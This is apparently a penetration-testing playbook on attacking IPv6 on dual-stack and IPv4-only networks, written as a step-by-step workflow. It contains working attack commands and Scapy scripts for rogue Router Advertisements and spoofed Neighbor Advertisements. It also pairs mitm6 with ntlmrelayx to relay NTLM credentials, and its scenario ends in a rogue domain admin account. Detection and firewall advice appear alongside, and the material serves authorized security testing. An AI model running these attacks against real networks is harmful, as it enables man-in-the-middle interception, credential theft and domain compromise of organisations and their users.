exploiting-ipv6-vulnerabilities

# Exploiting IPv6 Vulnerabilities

## When to Use

- Testing whether dual-stack networks have consistent security controls for both IPv4 and IPv6 traffic
- Demonstrating risks from unmanaged IPv6 on networks where only IPv4 is officially supported
- Exploiting SLAAC and Router Advertisement mechanisms to perform man-in-the-middle attacks via IPv6
- Testing IPv6-aware firewall rules and IDS/IPS detection for IPv6-specific attack patterns
- Identifying IPv6 tunneling protocols (6to4, Teredo, ISATAP) that bypass IPv4-only security controls

**Do not use** on production networks without written authorization, against systems where IPv6 disruption could cause safety issues, or for denial-of-service attacks against network infrastructure.

## Prerequisites

- Written authorization specifying IPv6 testing scope and approved techniques
- Kali Linux with THC-IPv6 toolkit, Scapy, and mitm6 installed
- Network interface with IPv6 support on the target network segment
- Understanding of IPv6 addressing, SLAAC, NDP, and Router Advertisements
- Wireshark for capturing and analyzing IPv6 traffic

## Workflow

### Step 1: Enumerate IPv6 on the Network

```bash
# Check if IPv6 is enabled on the local interface
ip -6 addr show

# Discover IPv6 hosts on the local link using multicast
ping6 -c 3 ff02::1%eth0
# ff02::1 = all-nodes multicast address

# Use alive6 from THC-IPv6 toolkit to discover hosts
sudo alive6 eth0

# Scan for IPv6-enabled hosts with Nmap
nmap -6 --script ipv6-multicast-mld-list -e eth0
nmap -6 -sn --script targets-ipv6-multicast-echo -e eth0

# Check for Router Advertisements on the network
sudo tcpdump -i eth0 -n -v icmp6 and 'ip6[40] == 134'
# Type 134 = Router Advertisement

# Use radvdump to capture existing RAs
sudo radvdump

# Check for DHCPv6 servers
sudo dhclient -6 -v eth0 --request-only
```

### Step 2: Perform SLAAC-Based MITM Attack with mitm6

```bash
# mitm6 exploits the default behavior of Windows machines to request
# IPv6 configuration via DHCPv6 when a Router Advertisement is seen

# Start mitm6 to become the IPv6 DNS server
sudo mitm6 -d example.com -i eth0

# mitm6 performs the following:
# 1. Sends Router Advertisements to enable IPv6 on victims
# 2. Responds to DHCPv6 requests, assigning itself as DNS server
# 3. Victims now send DNS queries to the attacker over IPv6
# 4. Attacker can respond with spoofed DNS replies

# Combine with ntlmrelayx for credential relay
sudo impacket-ntlmrelayx -6 -tf targets.txt -wh fake-wpad.example.com -l /tmp/loot

# This exploits:
# 1. WPAD (Web Proxy Auto-Discovery) via DNS
# 2. Windows sends NTLM authentication to the WPAD proxy
# 3. ntlmrelayx relays the credentials to target servers
```

### Step 3: Router Advertisement Spoofing

```python
#!/usr/bin/env python3
"""Rogue Router Advertisement for authorized IPv6 testing."""

from scapy.all import *
from scapy.layers.inet6 import *

# Craft a Router Advertisement packet
# This makes the attacker appear as the default IPv6 router

iface = "eth0"
attacker_mac = get_if_hwaddr(iface)
attacker_ipv6 = get_if_addr6(iface)

ra = (
    Ether(dst="33:33:00:00:00:01") /  # All-nodes multicast
    IPv6(src=attacker_ipv6, dst="ff02::1") /
    ICMPv6ND_RA(
        routerlifetime=1800,     # Advertise as router for 30 min
        prf=1,                   # High preference
        M=0,                     # No managed flag (use SLAAC)
        O=1                      # Other config via DHCPv6 (DNS)
    ) /
    ICMPv6NDOptSrcLLAddr(lladdr=attacker_mac) /
    ICMPv6NDOptPrefixInfo(
        prefix="2001:db8:dead::",  # Rogue prefix
        prefixlen=64,
        L=1,
        A=1,
        validlifetime=3600,
        preferredlifetime=1800
    ) /
    ICMPv6NDOptRDNSS(
        dns=[attacker_ipv6],  # Attacker as DNS server
        lifetime=1800
    )
)

print(f"[*] Sending rogue Router Advertisement from {attacker_ipv6}")
print(f"[*] Advertising prefix 2001:db8:dead::/64")
sendp(ra, iface=iface, count=5, inter=2)
print("[*] RA packets sent. Victims will configure IPv6 with rogue prefix.")
```

### Step 4: IPv6 Neighbor Discovery Attacks

```bash
# Neighbor Advertisement spoofing (IPv6 equivalent of ARP spoofing)
# Using THC-IPv6 parasite6 tool
sudo parasite6 eth0

# Or craft with Scapy
python3 << 'PYEOF'
from scapy.all import *
from scapy.layers.inet6 import *

# Spoof Neighbor Advertisement to redirect traffic
target_ipv6 = "2001:db8::50"    # Victim IPv6 address
gateway_ipv6 = "2001:db8::1"    # Gateway IPv6 address
attacker_mac = get_if_hwaddr("eth0")

# Tell the victim that we are the gateway
na = (
    Ether(dst="33:33:00:00:00:01") /
    IPv6(src=gateway_ipv6, dst="ff02::1") /
    ICMPv6ND_NA(
        tgt=gateway_ipv6,
        R=1, S=0, O=1  # Router flag, Override flag
    ) /
    ICMPv6NDOptDstLLAddr(lladdr=attacker_mac)
)

print("[*] Sending spoofed Neighbor Advertisements...")
sendp(na, iface="eth0", count=100, inter=1)
PYEOF

# Detect NDP spoofing with ndpmon
sudo ndpmon -i eth0
```

### Step 5: IPv6 Tunnel Detection and Exploitation

```bash
# Detect Teredo tunnels (IPv6 over UDP port 3544)
sudo tshark -i eth0 -Y "udp.port == 3544" -T fields -e ip.src -e ip.dst

# Detect 6to4 tunnels (protocol 41)
sudo tshark -i eth0 -Y "ip.proto == 41" -T fields -e ip.src -e ip.dst

# Detect ISATAP tunnels
sudo tshark -i eth0 -Y "ip.proto == 41 and ipv6.dst contains \"::5efe:\"" -c 10

# Scan for Teredo-enabled hosts
nmap -6 -sU -p 3544 --open 10.10.0.0/24

# Test if IPv6 tunnels bypass IPv4 firewall rules
# If Teredo is allowed, IPv6 traffic can bypass IPv4-only firewalls
curl -6 http://[2001:db8::50]:8080/  # Access via IPv6 tunnel

# Block unwanted IPv6 tunnels at the firewall
# iptables: block protocol 41 (6to4, ISATAP) and Teredo
sudo iptables -A INPUT -p 41 -j DROP
sudo iptables -A OUTPUT -p 41 -j DROP
sudo iptables -A INPUT -p udp --dport 3544 -j DROP
sudo iptables -A OUTPUT -p udp --dport 3544 -j DROP
```

### Step 6: Test IPv6 Firewall Rules and Document

```bash
# Verify ip6tables rules are in place
sudo ip6tables -L -n -v

# Test if IPv6 firewall mirrors IPv4 rules
# Common oversight: IPv4 firewall is strict, IPv6 is wide open
nmap -6 -sS -p- <target_ipv6_address>

# Compare IPv4 and IPv6 scan results
nmap -sS -p 1-1024 10.10.20.10 -oA ipv4_scan
nmap -6 -sS -p 1-1024 2001:db8::10 -oA ipv6_scan
diff <(grep "open" ipv4_scan.nmap) <(grep "open" ipv6_scan.nmap)

# Check for IPv6 RA Guard on the switch
# Cisco: show ipv6 snooping policies
# If not enabled, document as finding

# Clean up: stop all IPv6 attack tools
sudo killall mitm6 parasite6 2>/dev/null
```

## Key Concepts

| Term | Definition |
|------|------------|
| **SLAAC (Stateless Address Autoconfiguration)** | IPv6 mechanism where hosts automatically configure addresses from Router Advertisements without a DHCP server, exploitable by rogue RA injection |
| **Router Advertisement (RA)** | ICMPv6 message from routers announcing network prefixes, default gateway, and DNS configuration; rogue RAs enable MITM attacks |
| **NDP (Neighbor Discovery Protocol)** | IPv6 replacement for ARP that uses ICMPv6 for address resolution, router discovery, and duplicate address detection; vulnerable to spoofing |
| **mitm6** | Tool that exploits Windows DHCPv6 preference to become the IPv6 DNS server, enabling DNS spoofing and NTLM credential relay |
| **RA Guard** | Switch-level security feature that filters rogue Router Advertisements, preventing unauthorized hosts from acting as IPv6 routers |
| **IPv6 Tunneling** | Encapsulation of IPv6 packets within IPv4 (6to4, Teredo, ISATAP) that can bypass IPv4-only security controls and firewalls |

## Tools & Systems

- **mitm6**: IPv6 MITM tool that exploits SLAAC and DHCPv6 to become the DNS server for Windows hosts
- **THC-IPv6 Toolkit**: Comprehensive IPv6 attack toolkit including alive6, parasite6, fake_router6, and flood tools
- **Scapy**: Python packet manipulation for crafting custom ICMPv6 Router Advertisements and Neighbor Discovery packets
- **ndpmon**: IPv6 Neighbor Discovery Protocol monitor that detects rogue RAs and NDP spoofing
- **Nmap**: Network scanner with full IPv6 support including multicast discovery and IPv6-specific scripts

## Common Scenarios

### Scenario: Exploiting Unmanaged IPv6 on an IPv4-Only Enterprise Network

**Context**: A company officially only uses IPv4 on their corporate network, but Windows workstations have IPv6 enabled by default. During an internal penetration test, the tester discovers that IPv6 is active on the VLAN and no IPv6 security controls (RA Guard, IPv6 ACLs) are deployed.

**Approach**:
1. Discover that all Windows workstations have link-local IPv6 addresses and are listening for Router Advertisements
2. Run mitm6 to send DHCPv6 responses, becoming the IPv6 DNS server for all Windows hosts on the VLAN
3. Configure ntlmrelayx to relay WPAD-triggered NTLM authentication to the domain controller
4. Within 5 minutes, capture and relay NTLM credentials from 12 workstations, gaining access to file shares
5. Successfully relay a domain admin's NTLM hash to create a new domain admin account
6. Document that the lack of IPv6 security controls enabled full domain compromise without exploiting any traditional vulnerability
7. Recommend disabling IPv6 where not needed, deploying RA Guard on switches, and blocking DHCPv6 at the firewall

**Pitfalls**:
- Flooding the network with Router Advertisements can cause instability on some devices
- mitm6 affects all Windows hosts on the VLAN, not just the target -- ensure scope covers all potentially affected hosts
- Some environments have IPv6-dependent services (SCCM, certain Azure services) that break when IPv6 is disrupted
- Forgetting to check for IPv6 tunneling protocols that could provide alternative attack paths

## Output Format

```
## IPv6 Security Assessment Report

**Test ID**: IPV6-2024-001
**Target Network**: VLAN 10 (10.10.10.0/24, no official IPv6)
**Assessment Date**: 2024-03-15

### IPv6 Discovery

| Finding | Details |
|---------|---------|
| IPv6 Enabled Hosts | 147/150 workstations (Windows default) |
| Link-Local Addresses | Active on all discovered hosts |
| Router Advertisements | None detected (no IPv6 router) |
| DHCPv6 Server | None present |
| RA Guard | NOT configured on switches |
| IPv6 Firewall Rules | NONE (ip6tables empty) |

### Attack Results

| Attack | Result | Impact |
|--------|--------|--------|
| mitm6 DNS Takeover | SUCCESS | Became IPv6 DNS for 147 hosts |
| WPAD NTLM Relay | SUCCESS | Captured 23 NTLM authentications |
| Domain Admin Relay | SUCCESS | Created rogue domain admin account |
| IPv6 Port Scan | SUCCESS | All ports open (no ip6tables rules) |

### Recommendations
1. Deploy RA Guard on all access-layer switches (Critical)
2. Configure IPv6 ACLs mirroring IPv4 firewall rules (Critical)
3. Disable DHCPv6 client via Group Policy where IPv6 is not needed
4. Block IPv6 tunneling protocols (6to4, Teredo) at the firewall
5. Deploy IPv6-aware IDS rules for NDP spoofing detection
```